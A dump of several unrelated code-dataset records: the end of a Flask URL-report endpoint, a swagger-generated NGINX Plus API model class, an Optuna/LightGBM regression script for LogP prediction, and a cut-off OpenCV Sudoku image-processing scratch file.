request.form.get('url')\t\n\n\tif(vaild_url(url) == False):\n\t\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"Invaild URL\"})\n\t\n\t\n\tusername = session.get('user')\n\tdb = load_reportdb() \n\tcursor = db.cursor()\n\t\n\tquery = \"INSERT INTO report(username, url) VALUES (?,?)\"\n\tquery_exec = cursor.execute(query, (username, url))\n\tdb.commit()\n\n\tif not query_exec:\n\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"DB Error\"})\n\t\n\treturn json.dumps({\"success\":\"true\", \"msg\":\"Report Success\"})\n\n\napp.run('0.0.0.0',8080)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"6755795","text":"# coding: utf-8\n\n\"\"\"\n NGINX Plus REST API\n\n NGINX Plus REST [API](https://nginx.org/en/docs/http/ngx_http_api_module.html) provides access to NGINX Plus status information, on-the-fly configuration of upstream servers and key-value pairs management for [http](https://nginx.org/en/docs/http/ngx_http_keyval_module.html) and [stream](https://nginx.org/en/docs/stream/ngx_stream_keyval_module.html). # noqa: E501\n\n OpenAPI spec version: 2.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom nginxplus.models.nginx_http_upstream_peer_health_checks import NginxHTTPUpstreamPeerHealthChecks # noqa: F401,E501\nfrom nginxplus.models.nginx_http_upstream_peer_responses import NginxHTTPUpstreamPeerResponses # noqa: F401,E501\n\n\nclass NginxHTTPUpstreamPeer(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'int',\n 'server': 'str',\n 'service': 'str',\n 'name': 'str',\n 'backup': 'bool',\n 'weight': 'int',\n 'state': 'str',\n 'active': 'int',\n 'max_conns': 'int',\n 'requests': 'int',\n 'responses': 'NginxHTTPUpstreamPeerResponses',\n 'sent': 'int',\n 'received': 'int',\n 'fails': 'int',\n 'unavail': 'int',\n 'health_checks': 'NginxHTTPUpstreamPeerHealthChecks',\n 'downtime': 'int',\n 'downstart': 'datetime',\n 'selected': 'datetime',\n 'header_time': 'int',\n 'response_time': 'int'\n }\n\n attribute_map = {\n 'id': 'id',\n 'server': 'server',\n 'service': 'service',\n 'name': 'name',\n 'backup': 'backup',\n 'weight': 'weight',\n 'state': 'state',\n 'active': 'active',\n 'max_conns': 'max_conns',\n 'requests': 'requests',\n 'responses': 'responses',\n 'sent': 'sent',\n 'received': 'received',\n 'fails': 'fails',\n 'unavail': 'unavail',\n 'health_checks': 'health_checks',\n 'downtime': 'downtime',\n 'downstart': 'downstart',\n 'selected': 'selected',\n 'header_time': 'header_time',\n 'response_time': 'response_time'\n }\n\n def __init__(self, id=None, server=None, service=None, name=None, backup=None, weight=None, state=None, active=None, max_conns=None, requests=None, responses=None, sent=None, received=None, fails=None, unavail=None, health_checks=None, downtime=None, downstart=None, selected=None, header_time=None, response_time=None): # noqa: E501\n \"\"\"NginxHTTPUpstreamPeer - a model defined in Swagger\"\"\" # noqa: E501\n\n self._id = None\n self._server = None\n self._service = None\n self._name = None\n self._backup = None\n self._weight = None\n self._state = None\n self._active = None\n self._max_conns = None\n self._requests = None\n self._responses = None\n self._sent = None\n self._received = None\n self._fails = None\n self._unavail = None\n self._health_checks = None\n self._downtime = None\n self._downstart = None\n self._selected = None\n self._header_time = None\n self._response_time = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if server is not None:\n self.server = server\n if service is not None:\n self.service = service\n if name is not None:\n self.name = name\n if backup is not None:\n self.backup = backup\n if weight is not None:\n self.weight = weight\n if state is not None:\n self.state = state\n if active is not None:\n self.active = active\n if max_conns is not None:\n self.max_conns = max_conns\n if requests is not None:\n self.requests = requests\n if responses is not None:\n self.responses = responses\n if sent is not None:\n self.sent = sent\n if received is not None:\n self.received = received\n if fails is not None:\n self.fails = fails\n if unavail is not None:\n self.unavail = unavail\n if health_checks is not None:\n self.health_checks = health_checks\n if downtime is not None:\n self.downtime = downtime\n if downstart is not None:\n self.downstart = downstart\n if selected is not None:\n self.selected = selected\n if header_time is not None:\n self.header_time = header_time\n if response_time is not None:\n self.response_time = response_time\n\n @property\n def id(self):\n \"\"\"Gets the id of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The ID of the server. # noqa: E501\n\n :return: The id of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this NginxHTTPUpstreamPeer.\n\n The ID of the server. # noqa: E501\n\n :param id: The id of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._id = id\n\n @property\n def server(self):\n \"\"\"Gets the server of this NginxHTTPUpstreamPeer. # noqa: E501\n\n An address of the server. # noqa: E501\n\n :return: The server of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._server\n\n @server.setter\n def server(self, server):\n \"\"\"Sets the server of this NginxHTTPUpstreamPeer.\n\n An address of the server. # noqa: E501\n\n :param server: The server of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n\n self._server = server\n\n @property\n def service(self):\n \"\"\"Gets the service of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The service parameter value of the server directive. # noqa: E501\n\n :return: The service of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._service\n\n @service.setter\n def service(self, service):\n \"\"\"Sets the service of this NginxHTTPUpstreamPeer.\n\n The service parameter value of the server directive. # noqa: E501\n\n :param service: The service of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n\n self._service = service\n\n @property\n def name(self):\n \"\"\"Gets the name of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The name of the server specified in the server directive. # noqa: E501\n\n :return: The name of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this NginxHTTPUpstreamPeer.\n\n The name of the server specified in the server directive. # noqa: E501\n\n :param name: The name of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def backup(self):\n \"\"\"Gets the backup of this NginxHTTPUpstreamPeer. # noqa: E501\n\n A boolean value indicating whether the server is a backup server. # noqa: E501\n\n :return: The backup of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._backup\n\n @backup.setter\n def backup(self, backup):\n \"\"\"Sets the backup of this NginxHTTPUpstreamPeer.\n\n A boolean value indicating whether the server is a backup server. # noqa: E501\n\n :param backup: The backup of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: bool\n \"\"\"\n\n self._backup = backup\n\n @property\n def weight(self):\n \"\"\"Gets the weight of this NginxHTTPUpstreamPeer. # noqa: E501\n\n Weight of the server. # noqa: E501\n\n :return: The weight of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._weight\n\n @weight.setter\n def weight(self, weight):\n \"\"\"Sets the weight of this NginxHTTPUpstreamPeer.\n\n Weight of the server. # noqa: E501\n\n :param weight: The weight of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._weight = weight\n\n @property\n def state(self):\n \"\"\"Gets the state of this NginxHTTPUpstreamPeer. # noqa: E501\n\n Current state, which may be one of “up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”. # noqa: E501\n\n :return: The state of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: str\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this NginxHTTPUpstreamPeer.\n\n Current state, which may be one of “up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”. # noqa: E501\n\n :param state: The state of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"up\", \"draining\", \"down\", \"unavail\", \"checking\", \"unhealthy\"] # noqa: E501\n if state not in allowed_values:\n raise ValueError(\n \"Invalid value for `state` ({0}), must be one of {1}\" # noqa: E501\n .format(state, allowed_values)\n )\n\n self._state = state\n\n @property\n def active(self):\n \"\"\"Gets the active of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The current number of active connections. # noqa: E501\n\n :return: The active of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._active\n\n @active.setter\n def active(self, active):\n \"\"\"Sets the active of this NginxHTTPUpstreamPeer.\n\n The current number of active connections. # noqa: E501\n\n :param active: The active of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._active = active\n\n @property\n def max_conns(self):\n \"\"\"Gets the max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The max_conns limit for the server. # noqa: E501\n\n :return: The max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._max_conns\n\n @max_conns.setter\n def max_conns(self, max_conns):\n \"\"\"Sets the max_conns of this NginxHTTPUpstreamPeer.\n\n The max_conns limit for the server. # noqa: E501\n\n :param max_conns: The max_conns of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._max_conns = max_conns\n\n @property\n def requests(self):\n \"\"\"Gets the requests of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of client requests forwarded to this server. # noqa: E501\n\n :return: The requests of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._requests\n\n @requests.setter\n def requests(self, requests):\n \"\"\"Sets the requests of this NginxHTTPUpstreamPeer.\n\n The total number of client requests forwarded to this server. # noqa: E501\n\n :param requests: The requests of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._requests = requests\n\n @property\n def responses(self):\n \"\"\"Gets the responses of this NginxHTTPUpstreamPeer. # noqa: E501\n\n\n :return: The responses of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: NginxHTTPUpstreamPeerResponses\n \"\"\"\n return self._responses\n\n @responses.setter\n def responses(self, responses):\n \"\"\"Sets the responses of this NginxHTTPUpstreamPeer.\n\n\n :param responses: The responses of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: NginxHTTPUpstreamPeerResponses\n \"\"\"\n\n self._responses = responses\n\n @property\n def sent(self):\n \"\"\"Gets the sent of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of bytes sent to this server. # noqa: E501\n\n :return: The sent of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._sent\n\n @sent.setter\n def sent(self, sent):\n \"\"\"Sets the sent of this NginxHTTPUpstreamPeer.\n\n The total number of bytes sent to this server. # noqa: E501\n\n :param sent: The sent of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._sent = sent\n\n @property\n def received(self):\n \"\"\"Gets the received of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of bytes received from this server. # noqa: E501\n\n :return: The received of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._received\n\n @received.setter\n def received(self, received):\n \"\"\"Sets the received of this NginxHTTPUpstreamPeer.\n\n The total number of bytes received from this server. # noqa: E501\n\n :param received: The received of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._received = received\n\n @property\n def fails(self):\n \"\"\"Gets the fails of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The total number of unsuccessful attempts to communicate with the server. # noqa: E501\n\n :return: The fails of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._fails\n\n @fails.setter\n def fails(self, fails):\n \"\"\"Sets the fails of this NginxHTTPUpstreamPeer.\n\n The total number of unsuccessful attempts to communicate with the server. # noqa: E501\n\n :param fails: The fails of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._fails = fails\n\n @property\n def unavail(self):\n \"\"\"Gets the unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n\n How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold. # noqa: E501\n\n :return: The unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._unavail\n\n @unavail.setter\n def unavail(self, unavail):\n \"\"\"Sets the unavail of this NginxHTTPUpstreamPeer.\n\n How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold. # noqa: E501\n\n :param unavail: The unavail of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._unavail = unavail\n\n @property\n def health_checks(self):\n \"\"\"Gets the health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n\n\n :return: The health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: NginxHTTPUpstreamPeerHealthChecks\n \"\"\"\n return self._health_checks\n\n @health_checks.setter\n def health_checks(self, health_checks):\n \"\"\"Sets the health_checks of this NginxHTTPUpstreamPeer.\n\n\n :param health_checks: The health_checks of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: NginxHTTPUpstreamPeerHealthChecks\n \"\"\"\n\n self._health_checks = health_checks\n\n @property\n def downtime(self):\n \"\"\"Gets the downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n\n Total time the server was in the “unavail”, “checking”, and “unhealthy” states. # noqa: E501\n\n :return: The downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._downtime\n\n @downtime.setter\n def downtime(self, downtime):\n \"\"\"Sets the downtime of this NginxHTTPUpstreamPeer.\n\n Total time the server was in the “unavail”, “checking”, and “unhealthy” states. # noqa: E501\n\n :param downtime: The downtime of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._downtime = downtime\n\n @property\n def downstart(self):\n \"\"\"Gets the downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”. # noqa: E501\n\n :return: The downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._downstart\n\n @downstart.setter\n def downstart(self, downstart):\n \"\"\"Sets the downstart of this NginxHTTPUpstreamPeer.\n\n The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”. # noqa: E501\n\n :param downstart: The downstart of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._downstart = downstart\n\n @property\n def selected(self):\n \"\"\"Gets the selected of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The time (in milliseconds since Epoch) when the server was last selected to process a request. # noqa: E501\n\n :return: The selected of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._selected\n\n @selected.setter\n def selected(self, selected):\n \"\"\"Sets the selected of this NginxHTTPUpstreamPeer.\n\n The time (in milliseconds since Epoch) when the server was last selected to process a request. # noqa: E501\n\n :param selected: The selected of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._selected = selected\n\n @property\n def header_time(self):\n \"\"\"Gets the header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The average time to get the response header from the server. # noqa: E501\n\n :return: The header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._header_time\n\n @header_time.setter\n def header_time(self, header_time):\n \"\"\"Sets the header_time of this NginxHTTPUpstreamPeer.\n\n The average time to get the response header from the server. # noqa: E501\n\n :param header_time: The header_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._header_time = header_time\n\n @property\n def response_time(self):\n \"\"\"Gets the response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n\n The average time to get the full response from the server. # noqa: E501\n\n :return: The response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :rtype: int\n \"\"\"\n return self._response_time\n\n @response_time.setter\n def response_time(self, response_time):\n \"\"\"Sets the response_time of this NginxHTTPUpstreamPeer.\n\n The average time to get the full response from the server. # noqa: E501\n\n :param response_time: The response_time of this NginxHTTPUpstreamPeer. # noqa: E501\n :type: int\n \"\"\"\n\n self._response_time = response_time\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, NginxHTTPUpstreamPeer):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"nginxplus/models/nginx_http_upstream_peer.py","file_name":"nginx_http_upstream_peer.py","file_ext":"py","file_size_in_byte":23122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385208642","text":"# $ python3 newcomer3_6.py fukunishi_data.csv\n\nimport warnings\nwarnings.simplefilter('ignore')\n\nimport sys\nimport math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom rdkit import Chem, DataStructs\nfrom rdkit.Chem import AllChem, Descriptors, Descriptors3D\nfrom rdkit.ML.Descriptors import MoleculeDescriptors\nfrom RDKit_calc import RDKit_calculator\n\nfrom sklearn import *\nfrom sklearn.linear_model import *\nfrom sklearn.ensemble import RandomForestRegressor as RFR\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\n\nimport lightgbm as lgb\nimport optuna\n# import optuna.integration.lightgbm as olgb\n\n#*================================================*\n#Prepare for searching hyper parameter \n\ndef result_reg(reg):\n\treg.fit(X_train, y_train)\n\ty_pred = reg.predict(X_test)\n\tprint('#---------------------------------------#')\n\tprint('RMSE : ' + str(math.sqrt(mean_squared_error(y_test, y_pred))))\n\tprint('Q^2 : ' + str(r2_score(y_test, y_pred)))\n\tprint('#---------------------------------------#')\n\ndef objective_Ridge(trial):\n\talpha = trial.suggest_loguniform('alpha', 1e-4, 15)\n\tmax_iter = trial.suggest_loguniform('max_iter', 1, 1000)\n\n\treg = Ridge(alpha=alpha,\n\t\t\t max_iter=max_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_BRidge(trial):\n\talpha_1 = trial.suggest_loguniform('alpha_1', 1e-8, 1e-4)\n\talpha_2 = trial.suggest_loguniform('alpha_2', 1e-8, 1e-4)\n\tlambda_1 = trial.suggest_loguniform('lambda_1', 1e-8, 1e-4)\n\tlambda_2 = trial.suggest_loguniform('lambda_2', 1e-8, 1e-4)\n\tn_iter = trial.suggest_int('n_iter', 1, 500)\n\n\treg = BayesianRidge(alpha_1=alpha_1,\n\t\t\t\t\t\talpha_2=alpha_2,\n\t\t\t\t\t\tlambda_1=lambda_1,\n\t\t\t\t\t\tlambda_2=lambda_2,\n\t\t\t\t\t n_iter=n_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_SVR(trial):\n\tkernel = trial.suggest_categorical('kernel', ['linear', 'poly', 'rbf', 'sigmoid'])\n\tgamma = trial.suggest_categorical('gamma', ['scale', 'auto'])\n\ttol = trial.suggest_loguniform('tol', 1e-5, 1e-1)\n\tC = trial.suggest_loguniform('C', 1e-4, 10)\n\tepsilon = trial.suggest_loguniform('epsilon', 1e-4, 1e-1)\n\n\treg = svm.SVR(kernel=kernel,\n\t\t\t\t gamma=gamma,\n\t\t\t\t tol=tol,\n\t\t\t\t C=C,\n\t\t\t\t epsilon=epsilon)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_KN(trial):\n\tn_neighbors = trial.suggest_int('n_neighbors', 1, 15)\n\tweights = trial.suggest_categorical('weights', ['uniform', 'distance'])\n\talgorithm = trial.suggest_categorical('algorithm', ['auto', 'ball_tree', 'kd_tree', 'brute'])\n\tleaf_size = trial.suggest_int('leaf_size', 10, 50)\n\n\treg = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors,\n\t\t\t\t\t\t\t\t \t weights=weights,\n\t\t\t\t\t\t\t\t\t algorithm=algorithm,\n\t\t\t\t\t\t\t\t\t leaf_size=leaf_size,\n\t\t\t\t\t\t\t\t\t n_jobs=-1)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_RFR(trial):\n\tn_estimators = trial.suggest_int('n_estimators', 50, 200)\n\tmax_depth = trial.suggest_int('max_depth', 100, 500)\n\tmin_samples_split = trial.suggest_int('min_samples_split', 2, 5)\n\tmin_samples_leaf = trial.suggest_int('min_samples_leaf', 1, 10)\n\tmax_features = trial.suggest_categorical('max_features', ['auto', 'sqrt', 'log2'])\n\n\treg = RFR(n_estimators=n_estimators,\n\t\t\t max_depth=max_depth,\n\t\t\t min_samples_split=min_samples_split,\n\t\t\t min_samples_leaf=min_samples_leaf,\n\t\t\t max_features=max_features,\n\t\t\t n_jobs=-1,\n\t\t\t random_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n\ndef objective_LGB(trial):\n\tboosting_type = trial.suggest_categorical('boosting_type', ['gbdt', 'goss'])\n\tnum_leaves = trial.suggest_int('num_leaves', 30, 100)\n\tmax_depth = trial.suggest_int('max_depth', 700, 1000)\n\tlearning_rate = trial.suggest_loguniform('learning_rate', 5e-3, 5e-1)\n\tn_estimators = trial.suggest_int('n_estimators', 200, 500)\n\tmin_child_weight = trial.suggest_loguniform('min_child_weight', 1e-8, 1e-5)\n\tmin_child_samples = trial.suggest_int('min_child_samples', 8, 30)\n\treg_lambda = trial.suggest_loguniform('reg_lambda', 1e-9, 1e-5)\n\n\treg = lgb.LGBMRegressor(boosting_type=boosting_type,\n\t\t\t\t\t\t\tnum_leaves=num_leaves,\n\t\t\t\t\t\t\tmax_depth=max_depth,\n\t\t\t\t\t\t\tlearning_rate=learning_rate,\n\t\t\t\t\t\t\tn_estimators=n_estimators,\n\t\t\t\t\t\t\tmin_child_weight=min_child_weight,\n\t\t\t\t\t\t\tmin_child_samples=min_child_samples,\n\t\t\t\t\t\t\treg_lambda=reg_lambda,\n\t\t\t\t\t\t\tn_jobs=-1,\n\t\t\t\t\t\t\trandom_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n# def lgb_cv(X, y):\n# \tds = olgb.Dataset(X, y)\n# \tparams = {'objective':'regression',\n# \t\t\t 'metric':'rmse',\n# \t\t\t 'random_seed':0}\n# \ttuner = olgb.LightGBMTunerCV(params, ds, verbose_eval=-1, num_boost_round=1000, folds=KFold(n_splits=4), verbosity=-1)\n# \ttuner.run()\n# \tprint('LightGBM : Best parameters')\n# \tprint(tuner.best_params)\n# \tresult_reg(lgb.LGBMRegressor(**tuner.best_params), X, y)\n\n#*================================================*\n\ndf = pd.read_csv(sys.argv[1])\nsmiles = df['SMILES'].values\nRDKit_descriptor = RDKit_calculator(smiles)\n\n#set explanatory variables and response variable\nX = RDKit_descriptor.compute_2D_desc()\ny = df['LogP app'].values\n\n#Standardization of explanatory variables\nsc = StandardScaler()\nX = sc.fit_transform(X)\n\n#split data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=95, random_state=0)\n\n# study = optuna.create_study()\n# study.optimize(objective_Ridge, n_trials=100)\n# print('Ridge : Best parameters')\n# print(study.best_params)\n# result_reg(Ridge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_BRidge, n_trials=100)\n# print('BayesianRidge : Best parameters')\n# print(study.best_params)\n# result_reg(BayesianRidge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_SVR, n_trials=100)\n# print('SVR : Best parameters')\n# print(study.best_params)\n# result_reg(svm.SVR(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_KN, n_trials=100)\n# print('KNeighborsRegressor : Best parameters')\n# print(study.best_params)\n# result_reg(neighbors.KNeighborsRegressor(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_RFR, n_trials=100)\n# print('RFR : Best parameters')\n# print(study.best_params)\n# result_reg(RFR(**study.best_params))\n\nstudy = optuna.create_study()\nstudy.optimize(objective_LGB, n_trials=100)\nprint('LGB : Best parameters')\nprint(study.best_params)\nresult_reg(lgb.LGBMRegressor(**study.best_params))\n\n# lgb_cv(X, y)\n","sub_path":"newcomer3/newcomer3_6.py","file_name":"newcomer3_6.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584610079","text":"import cv2\n\nimg = cv2.imread('120_5096.jpg', cv2.CV_LOAD_IMAGE_COLOR)\ncv2.namedWindow('Image')\ncv2.imshow('Image',img)\ncv2.waitKey(0)\n##cv2.destroyAllWindows()\n\ngray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('color_image',image)\ncv2.imshow('gray_image',gray_image)\ncv2.waitKey(0)\n\n\nIn [81]: centroids = np.array(centroids,dtype = np.float32)\n\nIn [82]: c = centroids.reshape((shape(centroids)[0],shape(centroids)[1]))\n\nIn [86]: a = shape(centroids)[0]\n\nIn [87]: b = np.vstack([c2[i*(a/10):(i+1)*(a/10)][np.argsort(c2[i*(a/10):(i+1)*(a/10),0])] for i in xrange(a/10)])\n\nbm = b.reshape(((a/10),(a/10),2))\n\n\n\n############################################################################################################################################################\n\n## unwarp image (Sudoku Solver example)\n\n# 1. Image PreProcessing ( closing operation )\n\nimg = cv2.imread('120_5256.jpg') # 120_5096\nimg = cv2.GaussianBlur(img,(5,5),0)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nmask = np.zeros((gray.shape),np.uint8)\nkernel1 = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(11,11)) # ellipsiodal kernel (should test using other kernels to see the difference)\n\nclose = cv2.morphologyEx(gray,cv2.MORPH_CLOSE,kernel1) # advanced morphological transformation (closing operation - removing small black areas)\ndiv = np.float32(gray)/(close) # cleans up the image (no idea why!)\nres = np.uint8(cv2.normalize(div,div,0,255,cv2.NORM_MINMAX)) # linear normalization\nres2 = cv2.cvtColor(res,cv2.COLOR_GRAY2BGR) # gray to RGB\n\n# 2. Finding Sudoku Square and Creating Mask Image\n\nthresh = 